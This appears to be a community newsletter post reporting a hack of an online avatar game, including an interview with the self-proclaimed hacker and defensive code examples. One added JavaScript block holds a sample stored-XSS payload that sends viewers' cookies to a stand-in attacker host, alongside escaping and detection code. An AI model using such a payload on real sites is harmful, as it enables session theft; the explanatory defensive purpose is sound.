bimbocitybreaking · 2 months ago
State Wars Hacked, Ends 3 Days Early, Prompts Strike & Ban Wave
By LittleMissRachie | April 26 2025
Overnight US time, during day 3 of State Wars: Pretty in Pink, a 24-hour-old account without citizenship accumulated and spent two million State Wars points. The hacker appears to have had admin-level access, or an equivalent route around the site's controls, since the account kept "earning" and spending points from jail and then from a banned account, which to many signals problems with both Ximboland's security forces and the site's infrastructural durability in times of strife.
On Easter Sunday, April 20th, players had noticed something awry by 10:30PM. As early as 9pm, and within 24 hours of the account's creation, user nullplayer, supposedly a Sevillian, had reached level 21 and somehow accumulated more than two hundred seventy thousand State Wars points. By 9:35, almost half a million points and level 29. At first, state groups were thankful the hacker hadn't spent those points. They had spoken too soon. Shortly after, the account spent all of its points directly and bought a win for Seville, which had been in last place.
Answers? And a gripe with management
At 3:16 Ximboland time, user notnullplayer, claiming to be the hacker, brigaded every recent topic in the forum with a reply linking to a topic: Nullplayer's Guide to Breaking Ximboland's Security (and Free Diamonds for All). The post maligns Ximboland's lack of rate limits, and the mass-posting was the demonstration: by their own account the replies were scripted, first to the state town halls and then to every top thread in the forums, totalling 13 pages of posts on the profile. The post goes on to outline explicitly the tools used to exploit the website, and as a result will not be linked to, quoted in its entirety here, or made available to view. To be taken with a grain of salt, the purported hacker's Q&A is outlined below, in response to questions posed by user kimjongin:
Was[sic] the security breach been contained?
No, it wasn’t. It's been over a day and I haven’t seen a single line of code changed. Hopefully this post puts some pressure on the admins to actually do something.
Is our data safe?
Kind of — but not entirely. Passwords are encrypted, sure, but if an attacker gets access, they’re still vulnerable. And yes, SQL injection is still possible in this game.
(Don’t worry about payments - if I wanted money, I'd just threaten the admins. Way easier.)
Are our private outfits protected?
No. I'm determined enough to prove there’s a flaw, but not unemployed enough to actually write a script for a mass outfit change (but I could).
Interestingly, notnullplayer adds a final and personal jab at the outgoing Minister of Justice, KatieBoutique, who rallied multistate support against the hacked end to State Wars. KatieBoutique is a Reasonopian, whose state shared the lead with Freethinkerland and Agnostica early in the Pretty in Pink war, and was understandably enraged by the exploitation of State Wars.
Is Katie/Kate (whatever) a bitch?
Yes. Painfully so. She’s living proof of poor management — like it wasn’t obvious already.
This arguably signals that the hacker may be more familiar with Ximboland than they claim.
They outline the exploits used in what sounds like an older version of Ximboland: “Back then, I noticed some pretty serious security issues in the game. It seems to me that admins were aware, but didn’t do anything to fix them.” According to the post, “One major flaw let me inject JavaScript into fields like bios and signatures, which means anyone who viewed my profile or forum signature would unknowingly run scripts in their browser.”
The hacker claims “the game relies heavily on JavaScript for its client-side functionality,” and that as a result, “this kind of vulnerability could’ve let me silently steal sessions (including admin accounts) or perform actions as if I were them (like banning players without needing admin access, directly from their accounts, without any logs).” Simply put, the hacker could have run scripts in other players' browsers through their bio or their signature on a forum post. Merely viewing the post or profile, without clicking a link, would have run the script, which the hacker claims could have exposed users' outfits and profiles and even changed their passwords. notnullplayer goes on, “just by posting on the forum, I could’ve gained full control over all accounts who saw my posts or visited my profile.”
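The flaw the guide describes is stored cross-site scripting: the site saves the signature once and then writes it, unchanged, into every page where it appears, so the script runs in each viewer's browser with that viewer's session. What follows is an added example, not code from Ximboland or from the guide: a constructed payload of that kind, the string-building render that lets it execute, the output escaping that neutralises it, and a triage check a moderator tool could run over stored bios and signatures. Every function and field name here is an assumption; the site's real templates are not public.

```javascript
// Added example, not Ximboland code. Constructed sample of what an attacker
// might save as a forum signature: an image tag whose error handler ships the
// viewer's cookies to a server the attacker controls (hostname is made up).
const ATTACKER_SIGNATURE =
  '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';

// Vulnerable render: user-controlled text is concatenated straight into HTML.
// The browser parses <img onerror=...> as markup and runs the handler for
// every viewer of the post, with no click required.
function renderSignatureUnsafe(signature) {
  return `<div class="sig">${signature}</div>`;
}

// Output encoding for element content and double-quoted attribute values:
// the five characters that can end text or an attribute become entities.
// (URL and JavaScript contexts need different encoders; this one is only
// correct for the HTML body and quoted attributes.)
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Safe render: the same signature is displayed as literal text.
function renderSignatureSafe(signature) {
  return `<div class="sig">${escapeHtml(signature)}</div>`;
}

// Triage check over raw stored fields: anything an HTML parser would treat as
// a tag, or an inline on*= event handler, is worth a moderator's look.
// Escaping on output is the fix; this only finds fields to inspect.
function looksLikeHtmlInjection(field) {
  return /<\s*\/?[a-z!]/i.test(field) || /\bon[a-z]+\s*=/i.test(field);
}

// Does rendered HTML contain executable markup (a <script> tag or an element
// carrying an inline event handler)? A browser would parse it; matching the
// output string is enough to show the two renders differ.
function containsExecutableMarkup(html) {
  return /<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Session cookie attributes that keep document.cookie from reading the token,
// so a payload like the one above gets nothing even if it does run.
function sessionCookieHeader(token) {
  return `session=${token}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

console.log('unsafe:', renderSignatureUnsafe(ATTACKER_SIGNATURE));
console.log('safe:  ', renderSignatureSafe(ATTACKER_SIGNATURE));
console.log('flagged for review:', looksLikeHtmlInjection(ATTACKER_SIGNATURE));
```

Note that HttpOnly only blunts the cookie-theft variant; the "perform actions as if I were them" variant in the guide still works as long as the script runs, because the browser attaches the cookie to requests the script makes. Escaping on output is what actually stops it.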
According to Minister of Entertainment Tibby, the attack was an SQL injection, and nullplayer did in fact have an active script in their signature at one point: “inspecting nullplayer's signature, it seems they turned the script off, for now.” Tibby speculates that this “is also why some people were and some people weren't impacted,” and that “only those who looked at the posts while the script was on were vulnerable to those specific attacks.” A reply from user replytotibby stands out, claiming that not to be the case. The self-proclaimed hacker maintained that while the website is vulnerable to these kinds of SQL attacks, even now, that was not how the outfits were destroyed.
“I didn't use any of them. The javascript thing I told about on the post was fixed back then, years ago, just as I said I didn't make any posts with javascript on the signature. I clearly said SQL injections are possible, but I never used it. I also wouldn't need any player to do anything if I was to use it. I didn't spoof anything as well, pretending to be on other players' account. I just directly saved them from the API.”
Outfits were directly manipulated, turned into the silhouette used for private outfit thumbnails, or into the unsettling default Ximbo outfit featuring sunglasses and a black and yellow ensemble. The outfits of high-profile figures in State Wars and on the leaderboards, as well as Pink House officials, were targeted. The author of this article reached out to the yet-to-be-jailed account replytotibby, which had outlined the tools used to hack the website in Xeet replies to Minister of Entertainment Tibby, and was able to secure answers to a few questions. Granted, these responses are in the words of the self-proclaimed hacker, and are to be read with healthy skepticism. The interview is below, copied in its entirety.
Interview with replytotibby
What were your intentions in hacking the site? What message do you want to send?
Not really much, I just want those problems fixed. As I said in the post, besides the fun of it (coding bots, wreaking havoc, causing chaos and seeing people's reactions), I dislike irresponsible admins and lazy devs.
Why destroy peoples’ outfits?
I just wanted to show it's possible. Just messing with the war rankings seems too bland.
How did you choose whose outfits would be nullified?
I chose the most active ones, the ones who apparently were online the most, xeeting and participating in events. It seems to me that there is a specific group of players who know each other well and play a lot. And Katie because she's a disgrace to management. I used to be an admin for other games and website communities too, and I was proud of what I did. She just seems to want control over people. I also focused on people who annoyed me slightly or were really focused on the whole situation, as well as went completely random on some people, or used them to re-test the script.
What made you choose state war as a specific event to hijack?
I didn't hehe but I saw the chance for some fun on it because it seemed like a major event.
How do you know Katie? You referenced her personally.
After hacking I kept checking the website for the admins' reaction and players' as well, which is where most of the fun lies.
When did you first play Ximboland, and how would you describe the state of site safety then?
I can't tell when I first played because that could, maybe, tell on me, but it has been some years since then. Site safety was the same as now, exactly the same, nothing changed. New games, however, do seem a bit safer than old ones (or I just don't know how sliding puzzle works and don't have the patience to try)
Unfortunately the user doesn't go into detail on their history with the site, leaving investigators with few clues to their identity. They claim the attack isn't driven by personal vengeance, but little is known of their relationship to Ximboland.
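Taken together, the claims above describe an API that accepted writes to other players' outfits ("I just directly saved them from the API"), kept serving an account that was jailed and then banned, and put no limit on scripted posting. What follows is an added example, not Ximboland's code, of the server-side checks such an endpoint needs: the caller's identity comes from the session rather than from anything in the request, the caller may only write their own outfit, jailed or banned accounts are refused at the API rather than only hidden in the UI, and a per-account token bucket caps how fast any one account can post or save. The account table, session store, request shape and limits are constructed stand-ins; the real game's API is not known.

```javascript
// Added example, not Ximboland code. All data below is constructed.
const ACCOUNTS = new Map([
  ['katie', { status: 'active' }],
  ['nullplayer', { status: 'banned' }],
  ['tibby', { status: 'jailed' }],
]);

// Opaque session token -> account id. The server never trusts a player id
// supplied in the request body or path as proof of who is calling.
const SESSIONS = new Map([
  ['tok-katie', 'katie'],
  ['tok-null', 'nullplayer'],
  ['tok-tibby', 'tibby'],
]);

const OUTFITS = new Map(); // account id -> saved outfit

// Token bucket per account: `capacity` actions, refilled at `refillPerSec`.
// Posting and saving share the limiter, so one script cannot reply to every
// thread in the forum in a few minutes. `now` is injectable for testing.
class RateLimiter {
  constructor(capacity, refillPerSec, now = () => Date.now()) {
    this.capacity = capacity;
    this.refillPerSec = refillPerSec;
    this.now = now;
    this.buckets = new Map();
  }
  allow(key) {
    const t = this.now();
    const b = this.buckets.get(key) ?? { tokens: this.capacity, last: t };
    b.tokens = Math.min(this.capacity, b.tokens + ((t - b.last) / 1000) * this.refillPerSec);
    b.last = t;
    const ok = b.tokens >= 1;
    if (ok) b.tokens -= 1;
    this.buckets.set(key, b);
    return ok;
  }
}

// Resolve the caller from the session and refuse anything but an active account.
// This is the check that stops a jailed or banned account from still "earning".
function authenticate(sessionToken) {
  const accountId = SESSIONS.get(sessionToken);
  if (!accountId) return { ok: false, status: 401, error: 'no session' };
  const account = ACCOUNTS.get(accountId);
  if (!account || account.status !== 'active') {
    return { ok: false, status: 403, error: `account ${account?.status ?? 'missing'}` };
  }
  return { ok: true, accountId };
}

// Handler for PUT /outfits/:targetId. `req` is a constructed request shape:
// { sessionToken, targetId, outfit }.
function saveOutfit(req, limiter) {
  const auth = authenticate(req.sessionToken);
  if (!auth.ok) return { status: auth.status, error: auth.error };
  // Ownership check: the path parameter must match the authenticated caller.
  // Without it, any logged-in account can overwrite anyone's outfit.
  if (req.targetId !== auth.accountId) {
    return { status: 403, error: "cannot write another player's outfit" };
  }
  if (!limiter.allow(auth.accountId)) {
    return { status: 429, error: 'rate limited' };
  }
  OUTFITS.set(auth.accountId, req.outfit);
  return { status: 200 };
}

function outfitOf(accountId) {
  return OUTFITS.get(accountId);
}

// Stand-alone demo.
const demoLimiter = new RateLimiter(5, 1);
console.log(saveOutfit({ sessionToken: 'tok-null', targetId: 'katie', outfit: 'silhouette' }, demoLimiter));
console.log(saveOutfit({ sessionToken: 'tok-katie', targetId: 'katie', outfit: 'pink' }, demoLimiter));
console.log('katie now wears:', outfitOf('katie'));
```

The order of checks matters: authentication and ownership are decided before a token is spent, so a rejected cross-account write does not count against the caller's own quota, and a 429 is only ever returned to a caller who was otherwise allowed.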
The response
The interview and the JavaScript described in the guide suggest that anyone could have gained access to player outfits, forum functionality and other features like State Wars. What remained unknown for more than a week was the full extent of the vulnerability in 2025. SweetasNuts had not commented on the specific vulnerabilities of the site, nor had admins Mariolka and Sachem, until 6 days later, the 26th.
After the popular jailing of nullplayer, citizens widely supported Minister KatieBoutique, commenting in thanks for doing what she could to stop the hacker with the tools available to the Ministry of Justice. Replies to the MoJ's Xeets on the 20th are rife with comments like “Thank you Katie! ❤️” from user TokiKonoe, “rare katie W” from user alexa pro, and other cheers for the chief of the Fashion Police.
The first official response came from Prime Ximbo and reigning autocrat SweetasNuts on the 21st, a post titled Ximboland is under attack. In it, the Prime Ximbo is vague about the attack, providing information whose relevance is debated in the replies: “Preliminary reports from the Minister of defence suggest that this was an act of treason from someone who knows about Ximboland from within rather than an act of war from a foreign land. It goes without saying that when we catch the traitor then their punishment for this will be the complete deportation from Ximboland into permanent exile and we will notify the relevant legal authorities of their new homeland for illegally hacking into a private property. Justice will be served.”
The post provided no information about how the hack was possible, or what steps were being taken to secure the site. But the autocrat was quick to assuage nerves about the security of payment information. “A reminder that we store ZERO banking information in Ximboland so there is no information that you share with us that could be valuable to hostile foes like the idiot killjoy who did this. We use a 3rd party payment provider (paypal) exactly for this reason ie we have nothing of particular value to anyone. So please dont worry.” Storing no card data limits what a database leak can expose, but it does not protect a player from an attacker who can act as them through a hijacked session, which the guide claims was possible; whatever the site lets a logged-in player do with its PayPal integration, that attacker could do too.
With no direction for Pink House officials and no guidance on which game features were safe, confusion and uncertainty loomed, and on the 21st the chaos continued to spread. The outgoing Minister of Justice, with less than two weeks remaining in her term, Xeeted plans for jailings, on the grounds that “The leftists … brought The Hacker here, whether directly, or indirectly, through your actions, Xeets, attitudes, and glorifications of hatred, drugs, violence, and death.”
These arbitrary jailings were to continue, according to KatieBoutique, until Administration reached out to the MoJ with instructions.
“I am not done jailing people on the left who brought The Hacker here, whether directly, or indirectly. Until the admins figure out what to do…and let me know what they want me to do, I will continue jailing people as I see fit.” The reaction changed swiftly.
“Nope. Wasn’t that. I don’t care if you’re trying to rage bait, trying to blame other users on the site when this is very clearly a failing of Chris/SAN and admin isn’t productive and sure as shit won’t get you your money back,” wrote user Katrynah.
“Come on, I don't think they brought the hacker, this jailing is completely unjustified and undeserved ... People will just start deleting their accounts and the game will not be fun anymore :(“ wrote user Isolde.
Things escalated from there. Minister of Justice KatieBoutique then jailed Minister of Entertainment Tibby, claiming she was “on good terms with The Hacker,” going on to threaten her with indefinite jailing until the end of the term in May. Freethinkerland General KirstyD8 commented criticizing the jailing. “I think they need to be able to communicate with Chris and they can't do that in jail. Mostly Tibby.”
The Minister of Justice posted public accusations that the hack was done by the boyfriend of former PX bxdcherri. No evidence was provided, but bxdcherri was banned permanently by Administration soon after.
On April 23, Minister of Construction and coder Sachem responded to the hack, saying a full rollback would be performed, which left users nervous about the progress they had made since Sunday. The Minister assured the citizenry that they were hard at work determining the problem. Thankfully, Sachem's next post was a full recovery plan, stating that the specific weaknesses used against Ximboland would be repaired: "We take this extremely seriously, and we want to reassure you that these attack vectors have been fully identified and patched." It outlines what changes have been made and the technical fixes involved.
This unnerving and controversial series of events, following shortly after the sitewide shock in response to threats of the publication of revenge porn, led to the publication of a series of protest items in the shops. The items' publication led to several permanent bans. More on this in the next issue of the Bimbo City Breaking.
BREAKING: Ministry of Justice Lays Down New Outfit "Rules", Latest in Slew of Unprecedented New Guidelines and Jailings
by LittleMissRachie | April 3 2025
In another sweeping declaration, Minister of Justice Katie Boutique has implemented another of what she calls "laws." These come on the heels of recent Ministry orders against the use of the Don't Vote Me, I'm Only Helping signs, available in the shop, in more than one fight outfit. The latest rule says that because Bimboland is a legal entity within Great Britain, British law, which forbids handguns, ought to apply to the PNGs users adorn their avatars with. According to the order posted via Xeet, "Openly brandishing a handgun in your #1 slot avatar outfit will get you immediate jail." The order is seen as an overreach by many. The replies contain mostly disapproval, from a resounding "NOOOOOOOOOOOOOOOOOOOO" from user @Katrynah to other comments regarding British law and the ruling itself. One comment from user @cannabisbimbo reads, "this shit is so fucking goofy". While British law restricts private ownership of handguns, it also allows the artistic representation of anything that adheres to the region's strict defamation laws. Whether the community-curated shop item PNGs made by volunteer artists count as "artistic representation," or as the private ownership of firearms, is up for debate.
This new “law” comes in the wake of various others, including banning counting games in activity chats and banning the "Don't Vote Me" signs. Immediately following were several widely criticized jailings, of users including @LoveSoldier, @moonflower, and @GuGuMuMu, as well as the author of this bulletin. Citations include Gemima counting, criticizing the outfits of pro-Zionist players, and what the Minister cited as a violation of the guidance regarding "treason against the independent state known as the Fashionable Republic of Ximboland," in the form of pro-Palestine messages in profiles and Xeets. Most, if not all, of these "laws" are codified not in the forum but in Xeets, which leaves many users wondering whether laws can or should be made in a format fewer Bimbos get to see, and whether the Minister of Justice is acting within her jurisdiction.
More on this and the self-proclaimed Minister of Tyranny, tonight at 11.